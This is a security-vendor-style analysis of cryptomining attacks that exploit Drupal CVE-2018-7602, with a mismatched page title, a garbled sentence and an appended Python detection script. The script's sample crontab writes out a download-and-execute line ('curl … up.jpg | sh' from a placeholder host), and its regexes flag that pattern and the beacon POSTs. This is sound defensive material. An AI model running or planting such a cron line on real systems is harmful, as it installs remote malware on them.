Drupal hosting deutschland
4/28/2023

We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots. Of note are the ways these attacks hide behind the Tor network to elude detection and check the affected system first before infecting it with cryptocurrency-mining malware. While these attacks currently deliver resource-stealing and system performance-slowing malware, the vulnerability can be used as a doorway to other threats.

CVE-2018-7602 is a remote code execution (RCE) vulnerability affecting Drupal versions 7 and 8, which was patched on April 25, 2018. The security flaw was discovered after Drupal's security team looked into another vulnerability, CVE-2018-7600 (also known as Drupalgeddon 2, patched on March 28, 2018). Drupal's security team also reported that CVE-2018-7602 is being actively exploited in the wild. According to a researcher's technical analysis, successfully exploiting the vulnerability entails elevating the permission to modify or delete the content of a Drupal-run site.

How does the exploit lead to the Monero miner?

As shown in Figures 1 and 2, the attacks we've seen exploiting CVE-2018-7602 download a shell script, which will then retrieve an Executable and Linkable Format-based (ELF) downloader (detected by Trend Micro as ELF_DLOADR.DHG). As shown in Figure 3, the downloader will add a crontab entry (which, in Unix-based systems, contains commands to be executed on a schedule) to automatically update itself.

Figure 1: Code snippet showing how CVE-2018-7602 is exploited
Figure 2: Code snippet showing how the shell script is retrieved
Figure 3: A crontab entry added by the malware to auto-update itself

In this case, the command is to check the link from which it downloads and interprets a script named up.jpg posing as a JPEG file. The ELF-based downloader also retrieves a Monero-mining malware (COINMINER_TOOLXMR.O-ELF64) and installs it on the affected machine. The downloader employs the HTTP 1.0 POST method to send data back in its SEND_DATA() function. The target path for the POST method is /drupal/df.php.

Figure 4: The assembly codes of the SEND_DATA() function of the downloader

HTTP 1.0 traffic is quite uncommon in these kinds of attacks, as most of the HTTP traffic of many organizations is already HTTP 1.1 or later. Given this seeming variance, we foresee this as a pattern in future attacks.

The Monero miner installed on the machine is the open-source XMRig (version 2.6.3). It also checks whether the machine is to be compromised or not. When the miner starts to run, it changes its process name to and accesses the file /tmp/dvir.pid.

Figure 5: A part of XMRig included in the cryptocurrency-mining malware
Figure 6: The reversed pseudo codes of the Monero-miner's main() function

Figure 6 shows this furtive behavior, which the attacker/operator added in their modified version of XMRig. This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics.

The attacks are notable for the precautions they took in that they hide behind the Tor network. We were able to follow the malware's trail to 197.231.221.211. Based on WhoIs information, the IP segment 197.231.221.0/24 appears to belong to a virtual private network (VPN) provider. Additionally, we found that the IP address is a Tor exit node, one of the gateways where encrypted Tor traffic is passed on to the normal internet. In fact, Trend Micro has blocked 810 attacks in the past month coming from this IP address. Given that it's a Tor exit node, we are not certain if these attacks are related to the Monero-mining payload or are from a single threat actor. The bulk of attacks from this IP address exploit Heartbleed (CVE-2014-0160). The other attacks we observed exploited ShellShock (CVE-2014-6271), an information disclosure vulnerability in WEB GoAhead (CVE-2017-5674), and a memory leak flaw in Apache (CVE-2004-0113). Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address.

Note that these attacks exploit even old Linux or Unix-based vulnerabilities, underscoring the importance of defense in depth. This is particularly true for enterprises whose web applications and sites, like those that use Drupal, manage sensitive data and transactions.
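The two network- and host-side indicators described above (the downloader's HTTP/1.0 POST to /drupal/df.php and the crontab entry that fetches up.jpg and interprets it with a shell) can be turned into simple detection logic. This is an added example, not code from the original write-up; the access-log lines, crontab lines and the placeholder host name are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample input (not from the article): an Apache-style access log
# and a crontab, each with one benign line and one line showing the indicators
# the write-up describes. The host name in the cron URL is a placeholder.
ACCESS_LOG = """\
203.0.113.7 - - [01/Jun/2018:10:00:01 +0000] "GET /drupal/node/1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jun/2018:10:00:05 +0000] "POST /drupal/df.php HTTP/1.0" 200 17
"""
CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -s http://PLACEHOLDER-HOST/up.jpg | sh
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/(?P<ver>\d\.\d)"')
# A file with an image extension fetched and piped straight into a shell.
CRON_FETCH_SH_RE = re.compile(r"\b(curl|wget)\b.*\.jpe?g\b.*\|\s*(ba)?sh\b")

@dataclass
class Finding:
    source: str
    line: str
    reason: str

def scan_access_log(text: str) -> list[Finding]:
    """Flag the downloader's beacon (POST to /drupal/df.php) and, as a weaker
    signal, any other HTTP/1.0 POST, which modern clients rarely send."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"] == "/drupal/df.php":
            findings.append(Finding("access_log", line, "POST to /drupal/df.php (downloader beacon path)"))
        elif m["ver"] == "1.0":
            findings.append(Finding("access_log", line, "HTTP/1.0 POST (uncommon protocol version)"))
    return findings

def scan_crontab(text: str) -> list[Finding]:
    """Flag cron entries that download a .jpg and hand it to a shell, the
    self-update mechanism the downloader installs."""
    return [Finding("crontab", line, "fetched .jpg piped into a shell (auto-update pattern)")
            for line in text.splitlines() if CRON_FETCH_SH_RE.search(line)]

def scan_all() -> list[Finding]:
    return scan_access_log(ACCESS_LOG) + scan_crontab(CRONTAB)

if __name__ == "__main__":
    for f in scan_all():
        print(f"[{f.source}] {f.reason}: {f.line}")
```

On a real host, run the same two scanners over the web server's access log and the output of `crontab -l` for each account, and pair them with a check for the /tmp/dvir.pid file the miner touches.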